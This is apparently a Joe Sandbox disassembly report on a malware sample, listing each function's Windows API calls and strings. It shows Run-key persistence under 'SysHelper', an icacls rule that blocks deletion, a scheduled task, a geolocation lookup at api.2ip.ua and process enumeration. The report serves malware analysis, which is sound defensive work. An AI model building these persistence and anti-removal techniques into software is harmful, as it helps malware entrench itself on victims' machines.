                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2957410896-1224459563
                                                                                                        • Opcode ID: 4a965271d45640ad5782f821c5d0a379625dec3b018eb2539555d6d800b2a96a
                                                                                                        • Instruction ID: 1bc5a0f4a7b3354d894ba66b3736779f038ca3b572dd5e55f60bb7cd960c039c
                                                                                                        • Opcode Fuzzy Hash: 4a965271d45640ad5782f821c5d0a379625dec3b018eb2539555d6d800b2a96a
                                                                                                        • Instruction Fuzzy Hash: D9D2E2706043519BD724EF24EC56B9FB7E5BF84304F00092DF48597292EB79EA48EB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1D26C
                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00F1D28F
                                                                                                        • CoCreateInstance.OLE32(00FE506C,00000000,00000001,00FE4FEC,?,?,00000000,000000FF), ref: 00F1D2D5
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D2F0
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D309
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D322
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F1D33B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D397
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3A4
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3B1
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F1D3C2
                                                                                                        • CoUninitialize.OLE32 ref: 00F1D3D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                        • Opcode ID: 0453c9feae5c0aab30880877ea93059f339cc4302196bb2778f98a990306ee32
                                                                                                        • Instruction ID: 498001fc2fcb2d2b8ece050d4b8d836a28908f7ba7d63bf529af21893e918b6b
                                                                                                        • Opcode Fuzzy Hash: 0453c9feae5c0aab30880877ea93059f339cc4302196bb2778f98a990306ee32
                                                                                                        • Instruction Fuzzy Hash: 1F529271E00219DFDB00DBA4CC58FEEBBB5BF49704F148198E505AB291DB35AE85DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F22235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F22240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F22248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F22256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F22275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F22280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F22291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F222AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F222B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F222CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F222FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F22315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F2232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F22347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 12c830da8c6c2eb23731f2c20f56310586041b1682be42ab22b1bd39ab2c92f6
                                                                                                        • Instruction ID: 027481fe0bb6f3984bd14ee2f382873231a77a6494f0eccd12d2cbff97a58a63
                                                                                                        • Opcode Fuzzy Hash: 12c830da8c6c2eb23731f2c20f56310586041b1682be42ab22b1bd39ab2c92f6
                                                                                                        • Instruction Fuzzy Hash: 00318D71E0121EBBDB10EFA59C49EAEB7BCEF49314F00406AF544E7150DA789E41EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F1CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1CFDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                        • _memset.LIBCMT ref: 00F21D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F21E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F21EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F21EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F21EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F21ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F21EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F21EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F21F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F21F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F21F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F21F8E
                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F2202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F22036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F2204C
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F2206E
                                                                                                        • _memset.LIBCMT ref: 00F22090
                                                                                                        • lstrcpyW.KERNEL32(?,010102FC), ref: 00F220AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F220C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F220CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F220D7
                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F220F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F220FC
                                                                                                        • _memset.LIBCMT ref: 00F22120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F22146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F22158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F2216D
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F335B1
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3364A
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F33680
                                                                                                        • __gmtime64_s.LIBCMT ref: 00F3369D
                                                                                                        • __allrem.LIBCMT ref: 00F336F3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3370F
                                                                                                        • __allrem.LIBCMT ref: 00F33726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33744
                                                                                                        • __allrem.LIBCMT ref: 00F3375B
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F33779
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503770280-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3FB7B
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00F33B69,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • __tzset_nolock.LIBCMT ref: 00F3FB8E
                                                                                                          • Part of subcall function 00F3FE47: __lock.LIBCMT ref: 00F3FE6C
                                                                                                          • Part of subcall function 00F3FE47: ____lc_codepage_func.LIBCMT ref: 00F3FEB3
                                                                                                          • Part of subcall function 00F3FE47: __getenv_helper_nolock.LIBCMT ref: 00F3FED4
                                                                                                          • Part of subcall function 00F3FE47: _free.LIBCMT ref: 00F3FF07
                                                                                                          • Part of subcall function 00F3FE47: _strlen.LIBCMT ref: 00F3FF0E
                                                                                                          • Part of subcall function 00F3FE47: __malloc_crt.LIBCMT ref: 00F3FF15
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1282695788-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1074 f37b0b-f37b1a call f37ad7 ExitProcess
                                                                                                        APIs
                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00F37B11
                                                                                                          • Part of subcall function 00F37AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00F37B16,00F33B69,?,00F38BCA,000000FF,0000001E,01017BD0,00000008,00F38B0E,00F33B69,00F33B69), ref: 00F37AE6
                                                                                                          • Part of subcall function 00F37AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00F37AF8
                                                                                                        • ExitProcess.KERNEL32 ref: 00F37B1A
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 2427264223-0
                                                                                                        • Opcode ID: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction ID: 24376b462199e819c4e77428f1fdd948c982f029138fd4cf921681f6be0dd6ae
                                                                                                        • Opcode Fuzzy Hash: 2904aa0deadc30ac9f38701a82b55f6b01a56bab67d98831f369164cb8ac78d2
                                                                                                        • Instruction Fuzzy Hash: 79B0923000920CBBCF063F61DC0A85D3F2AEB003A2F008025F90408031EB76AA91AAD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1077 f37f3d-f37f47 call f37e0e 1079 f37f4c-f37f50 1077->1079
                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 00F37F47
                                                                                                          • Part of subcall function 00F37E0E: __lock.LIBCMT ref: 00F37E1C
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(01017B08,0000001C,00F37CFB,00F33B69,00000001,00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E5B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E6C
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E85
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(-00000004,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E95
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37E9B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37EB1
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00F33B69,?,00F350D7,0000000D), ref: 00F37EBC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2158581194-0
                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction ID: 97ccff28d8c60aa48329d1f1fadcbdcda5dcda6d069775e124362c29f2f1224e
                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction Fuzzy Hash: AFB012B198430C33DA213642EC03F053B0C4740B60F200070FA0C1C1E1A593B9A050C9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F91983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F91994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F919A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F919AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F919E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F919FB
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F91ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F91AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F91B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F91C36
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F91C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F91C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F91C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F91D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F91D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F91D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F91D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F91DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F91DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F91DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F91DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F91DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F91E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F91E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F91E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F91E44
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91F03
                                                                                                        • GetTickCount.KERNEL32 ref: 00F91FF1
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92095
                                                                                                        • GetTickCount.KERNEL32 ref: 00F920FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F92187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F921A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 842291066-1723836103
                                                                                                        • Opcode ID: e523015c4c89642283763829576395017a4b662ac68737ed8fba00411dca912a
                                                                                                        • Instruction ID: 0cfc96efacb8aeb276debaadf92bed526c885c4868cbd880247ad787918c4295
                                                                                                        • Opcode Fuzzy Hash: e523015c4c89642283763829576395017a4b662ac68737ed8fba00411dca912a
                                                                                                        • Instruction Fuzzy Hash: 5132BFB0E0022D9AEF619F68CC45B9EB7B9FF41714F0041EAA64CE6191EB758E80DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FDB3EC,000000FF), ref: 00F2E6C0
                                                                                                          • Part of subcall function 00F1C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00F1C6C2
                                                                                                          • Part of subcall function 00F1C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                          • Part of subcall function 00F1C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
